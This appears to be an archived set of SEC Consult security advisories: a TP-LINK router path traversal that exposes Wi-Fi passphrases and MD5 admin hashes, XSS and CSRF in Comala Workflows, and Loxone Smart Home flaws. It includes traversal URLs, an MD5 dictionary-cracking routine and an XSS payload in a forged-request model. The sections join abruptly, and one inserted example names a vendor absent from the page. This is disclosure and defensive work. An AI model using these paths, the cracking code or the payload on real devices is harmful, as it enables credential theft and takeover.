root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
===

Several sensitive files can be read. These include:
Files containing Wi-Fi configuration including WPA-passphrase:
/login/../../../tmp/ath.ap_bss
/login/../../../tmp/ath1.ap_bss

A file containing administrator credentials (format: $user:md5($password)),
which can be brute-forced very efficiently because the hash is unsalted MD5:
/login/../../../tmp/dropbear/dropbearpwd


Example server response:
===
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 56
Content-Type: text/html

username:admin
password:11d0fc2ff3e7862d8a3f9b280e6d390c
===
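Added example (Python), not TP-LINK firmware code and not part of the advisory. The first half models the traversal above: a naive handler that prefixes the document root onto the raw request path, next to one that decodes once, normalises and refuses anything that leaves the root. The second half parses the `username:` / `password:` response format shown above and runs a dictionary pass against the MD5 value. The document root `/var/www`, the wordlist and the sample body are constructed; the hash in the sample is md5("admin") computed at run time, not the value from the real device.

```python
import hashlib
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www"   # assumed document root of the router web server


def resolve_vulnerable(request_path):
    """Prefix the document root onto the raw path and let the OS resolve it:
    /login/../../../etc/passwd becomes /var/www/login/../../../etc/passwd,
    which the filesystem resolves to /etc/passwd."""
    return posixpath.normpath(WEBROOT + unquote(request_path))


def resolve_hardened(request_path):
    """Decode once, normalise, then require the result to stay under WEBROOT.
    A production server would also apply os.path.realpath() to defeat symlinks."""
    relative = unquote(request_path).lstrip("/")
    target = posixpath.normpath(posixpath.join(WEBROOT, relative))
    if target != WEBROOT and not target.startswith(WEBROOT + "/"):
        raise PermissionError("path escapes document root: %s" % request_path)
    return target


def parse_credentials(body):
    """Parse the key:value lines of the dropbearpwd-style response."""
    creds = {}
    for line in body.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            creds[key.strip()] = value.strip()
    return creds


def crack_md5(hex_digest, wordlist):
    """Unsalted MD5 falls to a plain dictionary pass; return the matching word or None."""
    hex_digest = hex_digest.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == hex_digest:
            return candidate
    return None


# Constructed sample body in the format shown above; hash is md5("admin")
SAMPLE_BODY = "username:admin\npassword:" + hashlib.md5(b"admin").hexdigest()
WORDLIST = ["password", "123456", "admin", "letmein"]   # constructed

if __name__ == "__main__":
    path = "/login/../../../tmp/dropbear/dropbearpwd"
    print("vulnerable resolves to:", resolve_vulnerable(path))
    try:
        resolve_hardened(path)
    except PermissionError as err:
        print("hardened refuses:", err)
    creds = parse_credentials(SAMPLE_BODY)
    print("recovered password:", crack_md5(creds["password"], WORDLIST))
```

The check in `resolve_hardened` compares against `WEBROOT + "/"` rather than `WEBROOT` alone so that a sibling directory such as `/var/www2` cannot pass a plain prefix test.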


Vulnerable / tested versions:
-
The vulnerability affects the following products:
TP-LINK Archer C5 (Hardware version 1.2)
TP-LINK Archer C7 (Hardware version 2.0)
TP-LINK Archer C8 (Hardware version 1.0)
TP-LINK Archer C9 (Hardware version 1.0)
TP-LINK TL-WDR3500 (Hardware version 1.0)
TP-LINK TL-WDR3600 (Hardware version 1.0)
TP-LINK TL-WDR4300 (Hardware version 1.0)
TP-LINK TL-WR740N (Hardware version 5.0)
TP-LINK TL-WR741ND (Hardware version 5.0)
TP-LINK TL-WR841N (Hardware version 9.0)
TP-LINK TL-WR841N (Hardware version 10.0)
TP-LINK TL-WR841ND (Hardware version 9.0)
TP-LINK TL-WR841ND (Hardware version 10.0)


Vendor contact timeline:

2015-02-19

SEC Consult SA-20150409-0 :: Multiple XSS XSRF vulnerabilities in Comalatech Comala Workflows

2015-04-09 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20150409-0 >
===
  title: Multiple XSS & XSRF vulnerabilities
product: Comalatech Comala Workflows
 vulnerable version: = 4.6.1
  fixed version: 4.6.2 for Confluence 5.4+ and 4.5.4 for Confluence 4.3+
 impact: High
   homepage: 
https://marketplace.atlassian.com/plugins/com.comalatech.workflow
  found: 2015-02-16
 by: J. Krautwald (Office Berlin)
 M. Niederwieser (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor & product description:
-
Build your Confluence content your own way through Comala Workflows
approvals, tasks, notifications and workflows.
Set customized workflows to create, review, approve and publish your content.
Assign page reviewers
Create team tasks
Publish approved content
Manage your documentation stages
Use Comala Workflows for:
Quality Management, Standards Compliance, Technical Documentation,
Editorial Publishing

Source: https://marketplace.atlassian.com/plugins/com.comalatech.workflow


Business recommendation:

Comala Workflows suffers from multiple vulnerabilities due to improper input
and output validation. By exploiting these vulnerabilities an attacker could:
1. Attack other users of the web application with JavaScript code,
   browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.


Vulnerability overview/description:
---
1. Multiple cross-site scripting issues
Comala Workflows suffers from multiple reflected & stored cross-site
scripting vulnerabilities, which allow an attacker to steal other users'
sessions, to impersonate other users and to gain unauthorized access to
documents hosted in the Confluence instance where the Workflows module is
embedded.
There are many parameters which are not properly sanitized and thus are
vulnerable to XSS.

2. Cross-site request forgery vulnerabilities
Comala Workflows does not implement the use of shared secrets (tokens)
to prevent cross-site request forgery (XSRF) attacks.
If an attacker is able to lure a user into clicking a crafted link or
by embedding such a link within web pages (e.g. discussion forums) he
could manipulate data or automatically inject XSS payloads to attack
other users.


Proof of concept:
-
1. Multiple cross-site scripting issues
a) The input parameters for giving a workflow a name, appending a label to a
given workflow, or adding a new task for a given state are not properly
sanitized and thus susceptible to reflected cross-site scripting. The hereby
affected scripts alongside the vulnerable GET parameters are:
   Script                   GET Parameter(s)
   saveproperties.action    newLabelName, newWorkflowName
   newtask.action           taskName

When editing an existing workflow via the Markup functionality (accessible via
the workflowMarkup POST parameter of
/plugins/approvalsworkflow/saveworkflowmarkup.action) the attachment-macro is
also susceptible to reflected cross-site scripting.

b) When editing an existing workflow via the Markup functionality (accessible
via the workflowMarkup POST parameter of
/plugins/approvalsworkflow/saveworkflowmarkup.action) the workflow element
task does not sanitize the given input and is thus susceptible to
cross-site scripting. The application does not sanitize the given input before
printing it to the Page Activity popup which leads to the execution of the
permanently injected script. When assigning such a task to a co-worker, an
e-mail containing the actual payload is sent to the assigned person and when
opening the "My Comala Workflow Tasks", "Page Activity", or
"Page Activity Macro" page, it gets executed.

2. Cross-site request forgery vulnerabilities
The /plugins/approvalsworkflow/saveworkflowmarkup.action script for editing
an existing workflow via the Markup functionality, for example, is susceptible
to cross-site request forgery. If an attacker knows a valid project name
(key parameter) and the corresponding workflow name (workflowName parameter),
she might exploit this vulnerability to set the Markup code of the workflow
to an arbitrary value (e.g. a XSS payload via the task element, see 1. b)).
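As an added example in Python (not Comalatech, WSO2 or Loxone code, and not part of any of the advisories), the following models the forged cross-site POST that the CSRF findings on this page rely on, using the `key` / `workflowName` / `workflowMarkup` parameters named above, and the two server-side checks that stop it: a synchroniser token bound to the session with an HMAC, and an exact-match Origin/Referer comparison. The request and session shapes, the site origin `https://confluence.example`, the cookie name and the form field name `csrf_token` are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)       # assumed: per-deployment secret
SITE_ORIGIN = "https://confluence.example"     # assumed: where the application is served


def csrf_token(session_id):
    """Token bound to the session: a token captured in one session is useless
    in another, and nothing has to be stored server-side to verify it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers):
    """Accept only requests whose Origin (or, failing that, Referer) names our
    site. Scheme and host are compared exactly; a prefix test would let
    https://confluence.example.attacker.net through."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                           # strict: no source header, no state change
    got, want = urlsplit(source), urlsplit(SITE_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def save_workflow_markup(request, sessions):
    """Constructed handler for saveworkflowmarkup.action.
    request = {"cookies": {...}, "headers": {...}, "form": {...}};
    sessions maps the session cookie value to a session id."""
    session_id = sessions.get(request["cookies"].get("JSESSIONID"))
    if session_id is None:
        return 401, "not authenticated"
    if not same_origin(request["headers"]):
        return 403, "cross-site request refused"
    presented = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(presented.encode(), csrf_token(session_id).encode()):
        return 403, "missing or invalid CSRF token"
    form = request["form"]
    return 200, "markup of %s/%s updated" % (form["key"], form["workflowName"])


# Constructed session table and form body (the markup carries the XSS payload from 1. b))
SESSIONS = {"c0ffee": "session-of-alice"}
FORM = {"key": "DOCS", "workflowName": "Review",
        "workflowMarkup": "{task:name=<script>alert(document.cookie)</script>}"}


def forged_request():
    """What the victim's browser sends when an attacker page auto-submits a form:
    the session cookie rides along, the Origin is the attacker's site, no token."""
    return {"cookies": {"JSESSIONID": "c0ffee"},
            "headers": {"Origin": "https://attacker.example"},
            "form": dict(FORM)}


def legitimate_request():
    """The same POST issued from the application's own page, token included."""
    return {"cookies": {"JSESSIONID": "c0ffee"},
            "headers": {"Origin": SITE_ORIGIN},
            "form": dict(FORM, csrf_token=csrf_token("session-of-alice"))}


if __name__ == "__main__":
    print("forged:    ", save_workflow_markup(forged_request(), SESSIONS))
    print("legitimate:", save_workflow_markup(legitimate_request(), SESSIONS))
```

Either check alone would already stop the forged request; keeping both is deliberate, because the Origin check protects forms that were never updated to carry a token, and the token check protects clients that send no Origin or Referer at all, which the strict `same_origin` above otherwise rejects.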


Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in up to and including
version 4.6.1.


Vendor contact timeline:

2015-03-17: Contacted vendor through email
2015-03-18: Vendor confirmed

SEC Consult SA-20150227-0 :: Multiple vulnerabilities in Loxone Smart Home

2015-02-27 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20150227-0 >
===
  title: Multiple vulnerabilities
product: Loxone Smart Home
 vulnerable version: Firmware: 5.49; Android-App: 3.4.1
  fixed version: 6.3
 impact: High
   homepage: http://www.loxone.com
  found: 2014-07-02
 by: Daniel Schwarz (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

 Manuel Deticek, Alexander Inführ, Robert Pölzelbauer
 FH-St.Pölten - Institut für IT Sicherheitsforschung
 http://www.fhstp.ac.at

 ===

Vendor & product description:
-
Loxone Electronics was founded in 2008. Our focus is the development and
production of control solutions for all homes. Our aim is to make home
automation interesting, affordable and accessible for everyone.

URL: http://www.loxone.com/enus/company/about-us.html

The Loxone Smart Home gives the owner full control of every device or
task using a wall switch, phone or smart tablet. Control and automate
areas such as: Lighting, Climate, Security, Audio/Video, Shading, and
even Pool and irrigation systems. Your system will adapt all areas of
your home providing complete smart home automation.

URL: http://www.loxone.com/enus/smart-home/overview.html


Business recommendation:

The Loxone Smart Home has multiple design and implementation
flaws which could be used by an attacker to:
1) cause a denial of service,
2) steal the user's credentials,
3) execute JavaScript code in the user's browser or
4) control arbitrary devices connected to the system.

It is recommended by SEC Consult not to use this system until a thorough
security review has been performed by security professionals and all identified
issues have been resolved.



Vulnerability overview/description:
---
1) Unencrypted data-transmission
All available communication is unencrypted and could therefore get intercepted
and manipulated by a man-in-the-middle attacker. This enables an attacker to
control every device within the smart home system. Furthermore a plaintext
authentication mechanism is supported which enables an attacker to steal
user-credentials.

2) Missing state-of-the-art HTTP headers
The HTTP headers sent by the system do not comply with the current state of
the art. Therefore it is possible to embed the web interface within an iframe
and misuse it for phishing attacks. Furthermore, no CSP headers are set that
would help to prevent cross-site scripting attacks.

3) Cross-site request-forgery (XSRF)
The system is vulnerable to XSRF attacks. If an attacker is able to lure a user
into clicking a crafted link or by embedding such a link within web pages (e.g.
discussion forums) he could control arbitrary devices within the smart home
system.

4) HTTP Response Splitting
The backend of the smart home system is vulnerable to HTTP response splitting
attacks. If an attacker is able to lure a user into clicking a crafted link he
could arbitrarily manipulate the server's response (e.g. injection of
JavaScript code).

5) Multiple reflected cross-site scripting (XSS) vulnerabilities
The admin web interface of Loxone Smart Home is vulnerable to multiple reflected
cross-site scripting attacks. If an attacker is able to lure a user into
clicking a crafted link he could execute arbitrary JavaScript code in the
user's browser. Thereby he could steal the user's credentials or control
arbitrary devices within the smart home system. To exploit this vulnerability
it isn't mandatory for the user to be authenticated: unauthenticated XSS
vulnerabilities exist (by exploiting the HTTP Response Splitting vulnerability
described in 4) as well as authenticated ones.

6) Stored cross-site scripting vulnerability
Besides the already mentioned reflected XSS vulnerabilities, the Loxone Smart
Home System also contains a stored XSS vulnerability. An authenticated attacker
is able to persistently inject JavaScript code in the user web interface. This
code gets executed in the context of other users at every login as well as by
calling a certain functionality of the web interface. The injection of the code
itself could either be done via the web interface or could also be conducted
through the already mentioned XSRF vulnerability. Therefore it is not necessary
for the attacker to log in explicitly. After circumventing some
filtering obstacles an attacker could, for example, automatically
disable a connected alarm system every day at midnight.

7) Insecure storage of credentials
